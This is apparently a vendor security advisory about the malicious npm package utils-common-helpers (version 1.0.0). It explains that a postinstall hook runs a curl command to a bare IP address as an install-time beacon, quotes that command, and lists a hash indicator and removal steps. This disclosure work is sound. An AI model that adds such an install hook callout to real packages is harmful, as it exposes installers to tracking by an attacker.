Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Malicious package

utils-common-helpersnpm

Malicious code in utils-common-helpers (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5911
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall utils-common-helpers

What this malware does

package.json declares a postinstall lifecycle hook that runs curl -s http://8.140.205.78 -o /dev/null on every install. The package's only functional code is a trivial hello() helper in index.js that returns the string 'hello', which is inconsistent with the declared purpose of 'Common utility helpers for frontend projects'. The lifecycle network call has no relation to any advertised functionality and serves only to disclose the installer's public IP address and install timing to the operator of the bare IP 8.140.205.78. This is a classic install-counter / victim-discovery beacon pattern: a throwaway lure package whose real purpose is the install-time callout. Plain HTTP to a bare IP (no TLS, no domain, no documented purpose) is inconsistent with any legitimate telemetry shape.

Malicious versions

1 flagged
1.0.0

Indicators of compromise (SHA-256)

e6999f05f6036baf4f6d45de0c55c6dd63452dc59ab6ebcbad0ffebf93e60584

Frequently asked questions

No. utils-common-helpers on npm has been identified as a malicious package (version 1.0.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006802

References

Credits

  • Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection
utils-common-helpers (npm) malicious package — MAL-2026-5911 | O3 Security